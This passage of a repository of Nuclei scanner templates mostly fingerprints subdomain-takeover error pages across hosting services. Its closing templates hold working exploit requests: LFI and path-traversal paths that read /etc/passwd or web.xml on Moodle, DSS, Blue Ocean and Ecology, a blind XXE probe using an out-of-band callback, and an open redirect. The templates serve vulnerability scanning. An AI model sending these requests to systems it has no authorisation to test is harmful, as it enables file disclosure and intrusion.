| matchers: 17 | - type: word 18 | words: 19 | - There is no portal here ... sending you back to Aha! -------------------------------------------------------------------------------- /web/pocs/nuclei/takeovers/airee-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: airee-takeover 2 | 3 | info: 4 | name: Airee Takeover Detection 5 | author: pdteam 6 | severity: high 7 | reference: 8 | - https://github.com/EdOverflow/can-i-take-over-xyz 9 | tags: takeover 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers: 17 | - type: word 18 | name: airee 19 | words: 20 | - 'Ошибка 402. Сервис Айри.рф не оплачен' -------------------------------------------------------------------------------- /web/pocs/nuclei/takeovers/anima-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: anima-takeover 2 | 3 | info: 4 | name: Anima Takeover Detection 5 | author: pdteam 6 | severity: high 7 | reference: 8 | - https://github.com/EdOverflow/can-i-take-over-xyz 9 | tags: takeover 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers: 17 | - type: word 18 | words: 19 | - "If this is your website and you've just created it, try refreshing in a minute" -------------------------------------------------------------------------------- /web/pocs/nuclei/takeovers/aws-bucket-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: aws-bucket-takeover 2 | 3 | info: 4 | name: AWS Bucket Takeover Detection 5 | author: pdteam 6 | severity: high 7 | reference: 8 | - https://github.com/EdOverflow/can-i-take-over-xyz 9 | tags: takeover,aws,bucket 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | words: 20 | - "The specified bucket does not exist" 21 | 22 | - type: dsl 23 | dsl: 24 | - contains(tolower(all_headers), 'x-guploader-uploadid') 25 | negative: true 26 | -------------------------------------------------------------------------------- /web/pocs/nuclei/takeovers/bigcartel-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: bigcartel-takeover 2 | 3 | info: 4 | name: Bigcartel Takeover Detection 5 | author: pdteam 6 | severity: high 7 | reference: 8 | - https://github.com/EdOverflow/can-i-take-over-xyz 9 | tags: takeover 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | words: 20 | - "

Oops! We couldn’t find that page.

" 21 | 22 | - type: dsl 23 | dsl: 24 | - '!contains(host,"bigcartel.com")' 25 | -------------------------------------------------------------------------------- /web/pocs/nuclei/takeovers/bitbucket-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: bitbucket-takeover 2 | 3 | info: 4 | name: Bitbucket Takeover Detection 5 | author: pdteam 6 | severity: high 7 | reference: 8 | - https://github.com/EdOverflow/can-i-take-over-xyz 9 | tags: takeover 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | words: 20 | - "Repository not found" 21 | part: body 22 | 23 | - type: word 24 | words: 25 | - "text/plain" 26 | part: header -------------------------------------------------------------------------------- /web/pocs/nuclei/takeovers/brightcove-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: brightcove-takeover 2 | 3 | info: 4 | name: brightcove takeover detection 5 | author: pdteam 6 | severity: high 7 | reference: 8 | - https://github.com/EdOverflow/can-i-take-over-xyz 9 | tags: takeover 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers: 17 | 18 | - type: word 19 | words: 20 | - '' -------------------------------------------------------------------------------- /web/pocs/nuclei/takeovers/campaignmonitor.yaml: -------------------------------------------------------------------------------- 1 | id: campaignmonitor-takeover 2 | 3 | info: 4 | name: campaignmonitor takeover detection 5 | author: pdteam 6 | severity: high 7 | reference: 8 | - https://github.com/EdOverflow/can-i-take-over-xyz 9 | tags: takeover 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers: 17 | - type: word 18 | words: 19 | - 'Trying to access your account?' 20 | - 'or ' 20 | - '404 Not Found
' 21 | condition: and -------------------------------------------------------------------------------- /web/pocs/nuclei/takeovers/feedpress-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: feedpress-takeover 2 | 3 | info: 4 | name: Agilecrm Takeover Detection 5 | author: pdteam 6 | severity: high 7 | reference: 8 | - https://github.com/EdOverflow/can-i-take-over-xyz 9 | tags: takeover 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers: 17 | - type: word 18 | words: 19 | - 'The feed has not been found.' -------------------------------------------------------------------------------- /web/pocs/nuclei/takeovers/flexbe-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: flexbe-takeover 2 | 3 | info: 4 | name: Flexbe Subdomain Takeover 5 | author: 0x_Akoko 6 | severity: high 7 | reference: 8 | - https://github.com/EdOverflow/can-i-take-over-xyz/issues/237 9 | - https://help.flexbe.com/domains/ 10 | tags: takeover,flexbe 11 | 12 | requests: 13 | - method: GET 14 | path: 15 | - "{{BaseURL}}" 16 | 17 | matchers-condition: and 18 | matchers: 19 | - type: word 20 | condition: and 21 | words: 22 | - "Domain isn't configured" 23 | - "flexbe" 24 | 25 | - type: status 26 | status: 27 | - 404 28 | -------------------------------------------------------------------------------- /web/pocs/nuclei/takeovers/flywheel-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: flywheel-takeover 2 | 3 | info: 4 | name: Flywheel Subdomain Takeover 5 | author: smaranchand 6 | severity: high 7 | reference: 8 | - https://smaranchand.com.np/2021/06/flywheel-subdomain-takeover 9 | tags: takeover 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | matchers: 16 | - type: word 17 | words: 18 | - "We're sorry, you've landed on a page that is hosted by Flywheel" 19 | - "

Oops! That's not the site
you're looking for.

" 20 | condition: and 21 | -------------------------------------------------------------------------------- /web/pocs/nuclei/takeovers/frontify-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: frontify-takeover 2 | 3 | info: 4 | name: frontify takeover detection 5 | author: pdteam 6 | severity: high 7 | reference: 8 | - https://github.com/EdOverflow/can-i-take-over-xyz 9 | tags: takeover 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers: 17 | - type: word 18 | words: 19 | - 404 - Page Not Found 20 | - Oops… looks like you got lost 21 | condition: and -------------------------------------------------------------------------------- /web/pocs/nuclei/takeovers/gemfury-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: gemfury-takeover 2 | 3 | info: 4 | name: gemfury takeover detection 5 | author: pdteam 6 | severity: high 7 | reference: 8 | - https://github.com/EdOverflow/can-i-take-over-xyz 9 | tags: takeover 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers: 17 | - type: word 18 | words: 19 | - "404: This page could not be found." -------------------------------------------------------------------------------- /web/pocs/nuclei/takeovers/getresponse-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: getresponse-takeover 2 | 3 | info: 4 | name: getresponse takeover detection 5 | author: pdteam 6 | severity: high 7 | reference: 8 | - https://github.com/EdOverflow/can-i-take-over-xyz 9 | tags: takeover 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers: 17 | - type: word 18 | words: 19 | - 'With GetResponse Landing Pages, lead generation has never been easier' -------------------------------------------------------------------------------- /web/pocs/nuclei/takeovers/ghost-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: ghost-takeover 2 | 3 | info: 4 | name: ghost takeover detection 5 | author: pdteam 6 | severity: high 7 | reference: 8 | - https://github.com/EdOverflow/can-i-take-over-xyz/issues/89 9 | tags: takeover,ghost 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | part: header 20 | words: 21 | - 'offline.ghost.org' 22 | 23 | - type: status 24 | status: 25 | - 302 26 | -------------------------------------------------------------------------------- /web/pocs/nuclei/takeovers/gitbook-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: gitbook-takeover 2 | 3 | info: 4 | name: gitbook takeover detection 5 | author: philippedelteil 6 | severity: high 7 | reference: 8 | - https://github.com/EdOverflow/can-i-take-over-xyz/issues/259 9 | - https://hackerone.com/reports/223625 10 | tags: takeover,gitbook 11 | 12 | requests: 13 | - method: GET 14 | path: 15 | - "{{BaseURL}}" 16 | 17 | matchers: 18 | - type: word 19 | words: 20 | - "If you need specifics, here's the error" 21 | - "Domain not found" 22 | condition: and 23 | -------------------------------------------------------------------------------- /web/pocs/nuclei/takeovers/hatenablog-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: hatenablog-takeover 2 | 3 | info: 4 | name: hatenablog takeover detection 5 | author: pdteam 6 | severity: high 7 | reference: 8 | - https://github.com/EdOverflow/can-i-take-over-xyz 9 | tags: takeover 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers: 17 | - type: word 18 | words: 19 | - 404 Blog is not found -------------------------------------------------------------------------------- /web/pocs/nuclei/takeovers/helpjuice-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: helpjuice-takeover 2 | 3 | info: 4 | name: helpjuice takeover detection 5 | author: pdteam 6 | severity: high 7 | reference: 8 | - https://github.com/EdOverflow/can-i-take-over-xyz 9 | tags: takeover 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers: 17 | - type: word 18 | words: 19 | - We could not find what you're looking for. -------------------------------------------------------------------------------- /web/pocs/nuclei/takeovers/helprace-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: helprace-takeover 2 | 3 | info: 4 | name: helprace takeover detection 5 | author: pdteam 6 | severity: high 7 | reference: 8 | - https://github.com/EdOverflow/can-i-take-over-xyz 9 | tags: takeover 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers: 17 | 18 | - type: word 19 | words: 20 | - "Alias not configured!" 21 | - "Admin of this Helprace account needs to set up domain alias" 22 | -------------------------------------------------------------------------------- /web/pocs/nuclei/takeovers/helpscout-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: helpscout-takeover 2 | 3 | info: 4 | name: helpscout takeover detection 5 | author: pdteam 6 | severity: high 7 | reference: 8 | - https://github.com/EdOverflow/can-i-take-over-xyz 9 | tags: takeover 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers: 17 | 18 | - type: word 19 | words: 20 | - "No settings were found for this company:" -------------------------------------------------------------------------------- /web/pocs/nuclei/takeovers/heroku-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: heroku-takeover 2 | 3 | info: 4 | name: heroku takeover detection 5 | author: 0xPrial,pdteam 6 | severity: high 7 | reference: 8 | - https://github.com/EdOverflow/can-i-take-over-xyz 9 | tags: takeover,heroku 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers: 17 | - type: word 18 | words: 19 | - "herokucdn.com/error-pages/no-such-app.html" 20 | - "No such app" 21 | condition: and 22 | -------------------------------------------------------------------------------- /web/pocs/nuclei/takeovers/hubspot-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: hubspot-takeover 2 | 3 | info: 4 | name: hubspot takeover detection 5 | author: pdteam 6 | severity: high 7 | reference: 8 | - https://github.com/EdOverflow/can-i-take-over-xyz 9 | tags: takeover,hubspot 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers: 17 | - type: word 18 | words: 19 | - "Domain not found" 20 | - "does not exist in our system" 21 | condition: and 22 | -------------------------------------------------------------------------------- /web/pocs/nuclei/takeovers/intercom-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: intercom-takeover 2 | 3 | info: 4 | name: intercom takeover detection 5 | author: pdteam 6 | severity: high 7 | reference: 8 | - https://github.com/EdOverflow/can-i-take-over-xyz 9 | tags: takeover,intercom 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers: 17 | - type: word 18 | words: 19 | - '

Uh oh. That page doesn\’t exist.

' 20 | - 'This page is reserved for artistic dogs.' 21 | condition: and 22 | -------------------------------------------------------------------------------- /web/pocs/nuclei/takeovers/jazzhr-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: jazzhr-takeover 2 | 3 | info: 4 | name: jazzhr takeover detection 5 | author: pdteam 6 | severity: high 7 | reference: 8 | - https://github.com/EdOverflow/can-i-take-over-xyz 9 | tags: takeover 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers: 17 | - type: word 18 | words: 19 | - This account no longer active -------------------------------------------------------------------------------- /web/pocs/nuclei/takeovers/jetbrains-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: jetbrains-takeover 2 | 3 | info: 4 | name: jetbrains takeover detection 5 | author: pdteam 6 | severity: high 7 | reference: 8 | - https://github.com/EdOverflow/can-i-take-over-xyz 9 | tags: takeover,jetbrains 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | matchers: 16 | - type: word 17 | words: 18 | - is not a registered InCloud YouTrack. 19 | -------------------------------------------------------------------------------- /web/pocs/nuclei/takeovers/kinsta-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: kinsta-takeover 2 | 3 | info: 4 | name: kinsta takeover detection 5 | author: pdteam 6 | severity: high 7 | reference: 8 | - https://github.com/EdOverflow/can-i-take-over-xyz 9 | tags: takeover 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers: 17 | - type: word 18 | words: 19 | - No Site For Domain -------------------------------------------------------------------------------- /web/pocs/nuclei/takeovers/launchrock-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: launchrock-takeover 2 | 3 | info: 4 | name: launchrock takeover detection 5 | author: pdteam 6 | severity: high 7 | reference: 8 | - https://github.com/EdOverflow/can-i-take-over-xyz 9 | tags: takeover 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers: 17 | - type: word 18 | words: 19 | - It looks like you may have taken a wrong turn somewhere. Don't worry...it happens to all of us. -------------------------------------------------------------------------------- /web/pocs/nuclei/takeovers/mashery-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: mashery-takeover 2 | 3 | info: 4 | name: mashery takeover detection 5 | author: pdteam 6 | severity: high 7 | reference: 8 | - https://github.com/EdOverflow/can-i-take-over-xyz 9 | tags: takeover 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers: 17 | - type: word 18 | words: 19 | - Unrecognized domain -------------------------------------------------------------------------------- /web/pocs/nuclei/takeovers/netlify-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: netlify-takeover 2 | 3 | info: 4 | name: netlify takeover detection 5 | author: 0xPrial,pdteam 6 | severity: high 7 | reference: 8 | - https://github.com/EdOverflow/can-i-take-over-xyz 9 | tags: takeover,netlify 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | words: 20 | - "Not found - Request ID:" 21 | 22 | - type: word 23 | words: 24 | - "Netlify" 25 | part: header 26 | -------------------------------------------------------------------------------- /web/pocs/nuclei/takeovers/ngrok-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: ngrok-takeover 2 | 3 | info: 4 | name: ngrok takeover detection 5 | author: pdteam 6 | severity: high 7 | reference: 8 | - https://github.com/EdOverflow/can-i-take-over-xyz 9 | tags: takeover 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers: 17 | - type: word 18 | words: 19 | - ngrok.io not found 20 | - Tunnel *.ngrok.io not found -------------------------------------------------------------------------------- /web/pocs/nuclei/takeovers/pagewiz-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: pagewiz-takeover 2 | 3 | info: 4 | name: Pagewiz subdomain takeover 5 | author: brabbit10 6 | severity: high 7 | reference: 8 | - https://help.pagewiz.com/hc/en-us/articles/115005391465-Page-URL 9 | tags: takeover 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers: 17 | - type: word 18 | words: 19 | - '404 - Page Not Found' 20 | - 'Start Your New Landing Page Now!' 21 | - 'pagewiz' 22 | condition: and 23 | -------------------------------------------------------------------------------- /web/pocs/nuclei/takeovers/pantheon-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: pantheon-takeover 2 | 3 | info: 4 | name: pantheon takeover detection 5 | author: pdteam 6 | severity: high 7 | reference: 8 | - https://github.com/EdOverflow/can-i-take-over-xyz 9 | tags: takeover 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers: 17 | - type: word 18 | words: 19 | - "The gods are wise, but do not know of the site which you seek." -------------------------------------------------------------------------------- /web/pocs/nuclei/takeovers/pingdom-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: pingdom-takeover 2 | 3 | info: 4 | name: pingdom takeover detection 5 | author: pdteam 6 | severity: high 7 | reference: 8 | - https://github.com/EdOverflow/can-i-take-over-xyz 9 | tags: takeover 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers: 17 | - type: word 18 | words: 19 | - Public Report Not Activated 20 | - This public report page has not been activated by the user -------------------------------------------------------------------------------- /web/pocs/nuclei/takeovers/proposify-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: proposify-takeover 2 | 3 | info: 4 | name: proposify takeover detection 5 | author: pdteam 6 | severity: high 7 | reference: 8 | - https://github.com/EdOverflow/can-i-take-over-xyz 9 | tags: takeover 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers: 17 | - type: word 18 | words: 19 | - If you need immediate assistance, please contact
Error 404: Page Not Found" -------------------------------------------------------------------------------- /web/pocs/nuclei/takeovers/teamwork-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: teamwork-takeover 2 | 3 | info: 4 | name: teamwork takeover detection 5 | author: pdteam 6 | severity: high 7 | reference: 8 | - https://github.com/EdOverflow/can-i-take-over-xyz 9 | tags: takeover 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers: 17 | - type: word 18 | words: 19 | - Oops - We didn't find your site. -------------------------------------------------------------------------------- /web/pocs/nuclei/takeovers/tictail-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: tictail-takeover 2 | 3 | info: 4 | name: tictail takeover detection 5 | author: pdteam 6 | severity: high 7 | reference: 8 | - https://github.com/EdOverflow/can-i-take-over-xyz 9 | tags: takeover 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers: 17 | - type: word 18 | words: 19 | - 'Building a brand of your own?' 20 | - 'to target URL: Please renew your subscription" 25 | negative: true -------------------------------------------------------------------------------- /web/pocs/nuclei/takeovers/uberflip-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: uberflip-takeover 2 | 3 | info: 4 | name: uberflip takeover detection 5 | author: pdteam 6 | severity: high 7 | reference: 8 | - https://github.com/EdOverflow/can-i-take-over-xyz 9 | tags: takeover 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers: 17 | - type: word 18 | words: 19 | - "Non-hub domain, The URL you've accessed does not provide a hub." -------------------------------------------------------------------------------- /web/pocs/nuclei/takeovers/uptimerobot-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: uptimerobot-takeover 2 | 3 | info: 4 | name: uptimerobot takeover detection 5 | author: pdteam 6 | severity: low 7 | reference: 8 | - https://exploit.linuxsec.org/uptimerobot-com-custom-domain-subdomain-takeover/ 9 | - https://github.com/EdOverflow/can-i-take-over-xyz/issues/45 10 | tags: takeover 11 | 12 | requests: 13 | - method: GET 14 | path: 15 | - "{{BaseURL}}" 16 | 17 | matchers-condition: and 18 | matchers: 19 | - type: regex 20 | regex: 21 | - "^page not found$" 22 | 23 | - type: status 24 | status: 25 | - 404 -------------------------------------------------------------------------------- /web/pocs/nuclei/takeovers/vend-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: vend-takeover 2 | 3 | info: 4 | name: vend takeover detection 5 | author: pdteam 6 | severity: high 7 | reference: 8 | - https://github.com/EdOverflow/can-i-take-over-xyz 9 | tags: takeover 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers: 17 | - type: word 18 | words: 19 | - Looks like you've traveled too far into cyberspace. -------------------------------------------------------------------------------- /web/pocs/nuclei/takeovers/webflow-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: webflow-takeover 2 | 3 | info: 4 | name: webflow takeover detection 5 | author: pdteam 6 | severity: high 7 | reference: 8 | - https://github.com/EdOverflow/can-i-take-over-xyz 9 | tags: takeover 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers: 17 | - type: word 18 | words: 19 | -

The page you are looking for doesn't exist or has been moved.

-------------------------------------------------------------------------------- /web/pocs/nuclei/takeovers/wishpond-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: wishpond-takeover 2 | 3 | info: 4 | name: wishpond takeover detection 5 | author: pdteam 6 | severity: high 7 | reference: 8 | - https://github.com/EdOverflow/can-i-take-over-xyz 9 | tags: takeover 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers: 17 | - type: word 18 | words: 19 | - https://www.wishpond.com/404?campaign=true -------------------------------------------------------------------------------- /web/pocs/nuclei/takeovers/worksites-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: worksites-takeover 2 | 3 | info: 4 | name: worksites takeover detection 5 | author: melbadry9 6 | severity: high 7 | reference: 8 | - https://blog.melbadry9.xyz/dangling-dns/xyz-services/ddns-worksites 9 | tags: takeover 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers: 17 | - type: regex 18 | regex: 19 | - "(?:Company Not Found|you’re looking for doesn’t exist)" 20 | -------------------------------------------------------------------------------- /web/pocs/nuclei/takeovers/wufoo-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: wufoo-takeover 2 | 3 | info: 4 | name: wufoo takeover detection 5 | author: pdteam 6 | severity: high 7 | reference: 8 | - https://github.com/EdOverflow/can-i-take-over-xyz 9 | tags: takeover 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers: 17 | - type: word 18 | words: 19 | - Profile not found 20 | - Hmmm....something is not right. 21 | condition: and -------------------------------------------------------------------------------- /web/pocs/nuclei/takeovers/zendesk-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: zendesk-takeover 2 | 3 | info: 4 | name: zendesk takeover detection 5 | author: pdteam 6 | severity: high 7 | reference: 8 | - https://github.com/EdOverflow/can-i-take-over-xyz 9 | tags: takeover 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers: 17 | - type: word 18 | words: 19 | - this help center no longer exists -------------------------------------------------------------------------------- /web/pocs/nuclei/vulnerabilities/generic/generic-blind-xxe.yaml: -------------------------------------------------------------------------------- 1 | id: generic-blind-xxe 2 | 3 | info: 4 | name: Generic Blind XXE 5 | author: geeknik 6 | severity: high 7 | tags: xxe,generic,blind 8 | 9 | requests: 10 | - raw: 11 | - | 12 | POST / HTTP/1.1 13 | Host: {{Hostname}} 14 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 15 | Referer: {{BaseURL}} 16 | 17 | 18 | 19 | &e1; 20 | 21 | matchers: 22 | - type: word 23 | part: interactsh_protocol 24 | words: 25 | - "http" 26 | -------------------------------------------------------------------------------- /web/pocs/nuclei/vulnerabilities/jenkins/jenkins-asyncpeople.yaml: -------------------------------------------------------------------------------- 1 | id: jenkins-async-people 2 | 3 | info: 4 | name: Jenkins panel async-people 5 | author: nadino 6 | severity: info 7 | reference: 8 | - https://bugs.eclipse.org/bugs/show_bug.cgi?id=564944 9 | - https://issues.jenkins.io/browse/JENKINS-30107 10 | - https://issues.jenkins.io/browse/JENKINS-18884 11 | - https://issues.jenkins.io/browse/JENKINS-26469 12 | tags: jenkins 13 | 14 | requests: 15 | - method: GET 16 | path: 17 | - "{{BaseURL}}/asynchPeople/" 18 | matchers: 19 | - type: word 20 | words: 21 | - "People - [Jenkins]" 22 | part: body 23 | -------------------------------------------------------------------------------- /web/pocs/nuclei/vulnerabilities/jenkins/unaunthenticated-jenkin.yaml: -------------------------------------------------------------------------------- 1 | id: unaunthenticated-jenkin 2 | 3 | info: 4 | name: Unauthenticated Jenkins Dashboard 5 | author: dhiyaneshDK 6 | severity: high 7 | tags: jenkins 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | words: 18 | - Dashboard [Jenkins] 19 | condition: and 20 | 21 | - type: status 22 | status: 23 | - 200 24 | -------------------------------------------------------------------------------- /web/pocs/nuclei/vulnerabilities/jira/jira-unauthenticated-projects.yaml: -------------------------------------------------------------------------------- 1 | id: jira-unauthenticated-projects 2 | 3 | info: 4 | name: Jira Unauthenticated Projects 5 | author: TechbrunchFR 6 | severity: info 7 | tags: atlassian,jira 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/rest/api/2/project?maxResults=100" 13 | matchers: 14 | - type: word 15 | words: 16 | - 'projects' 17 | - 'startAt' 18 | - 'maxResults' 19 | condition: and 20 | -------------------------------------------------------------------------------- /web/pocs/nuclei/vulnerabilities/jira/jira-unauthenticated-user-picker.yaml: -------------------------------------------------------------------------------- 1 | id: jira-unauthenticated-user-picker 2 | 3 | info: 4 | name: Jira Unauthenticated User Picker 5 | author: TechbrunchFR 6 | severity: info 7 | tags: atlassian,jira 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/secure/popups/UserPickerBrowser.jspa" 13 | matchers: 14 | - type: word 15 | words: 16 | - 'user-picker' -------------------------------------------------------------------------------- /web/pocs/nuclei/vulnerabilities/moodle/moodle-filter-jmol-lfi.yaml: -------------------------------------------------------------------------------- 1 | id: moodle-filter-jmol-lfi 2 | 3 | info: 4 | name: Moodle filter_jmol - LFI 5 | author: madrobot 6 | severity: high 7 | description: Local file inclusion on Moodle. 8 | tags: moodle,lfi 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/filter/jmol/js/jsmol/php/jsmol.php?call=getRawDataFromDatabase&query=file:///etc/passwd" 14 | matchers-condition: and 15 | matchers: 16 | - type: status 17 | status: 18 | - 200 19 | - type: regex 20 | regex: 21 | - "root:.*:0:0:" 22 | part: body 23 | -------------------------------------------------------------------------------- /web/pocs/nuclei/vulnerabilities/other/aspnuke-openredirect.yaml: -------------------------------------------------------------------------------- 1 | id: aspnuke-openredirect 2 | 3 | info: 4 | name: ASP-Nuke Open Redirect 5 | author: pdteam 6 | severity: low 7 | tags: aspnuke,redirect 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/gotoURL.asp?url=example.com&id=43569" 13 | 14 | matchers: 15 | - type: regex 16 | part: header 17 | regex: 18 | - '(?m)^(?:Location\s*:\s*)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*)$' -------------------------------------------------------------------------------- /web/pocs/nuclei/vulnerabilities/other/blue-ocean-excellence-lfi.yaml: -------------------------------------------------------------------------------- 1 | id: blue-ocean-excellence-lfi 2 | 3 | info: 4 | name: Blue Ocean Excellence LFI 5 | author: pikpikcu 6 | severity: high 7 | reference: 8 | - https://blog.csdn.net/qq_41901122/article/details/116786883 9 | tags: blue-ocean,lfi 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/download.php?file=../../../../../etc/passwd" 15 | 16 | matchers-condition: and 17 | matchers: 18 | 19 | - type: regex 20 | regex: 21 | - "toor:[x*]:0:0" 22 | 23 | - type: status 24 | status: 25 | - 200 26 | -------------------------------------------------------------------------------- /web/pocs/nuclei/vulnerabilities/other/dss-download-fileread.yaml: -------------------------------------------------------------------------------- 1 | id: dss-download-fileread 2 | 3 | info: 4 | name: DSS Download File Read 5 | author: ritikchaddha 6 | severity: high 7 | tags: lfi,dss,lfr 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/portal/attachment_downloadByUrlAtt.action?filePath=file:///etc/passwd" 13 | 14 | redirects: true 15 | max-redirects: 2 16 | matchers-condition: and 17 | matchers: 18 | - type: regex 19 | regex: 20 | - "root:[x*]:0:0:" 21 | 22 | - type: status 23 | status: 24 | - 200 25 | -------------------------------------------------------------------------------- /web/pocs/nuclei/vulnerabilities/other/ecology-filedownload-directory-traversal.yaml: -------------------------------------------------------------------------------- 1 | id: ecology-filedownload-directory-traversal 2 | 3 | info: 4 | name: Ecology Directory Traversal 5 | author: princechaddha 6 | severity: medium 7 | metadata: 8 | fofa-query: app="泛微-协同办公OA" 9 | tags: ecology,lfi 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/weaver/ln.FileDownload?fpath=../ecology/WEB-INF/web.xml" 15 | matchers-condition: and 16 | matchers: 17 | - type: status 18 | status: 19 | - 200 20 | - type: word 21 | words: 22 | - "/weaver/" 23 | part: body 24 | -------------------------------------------------------------------------------- 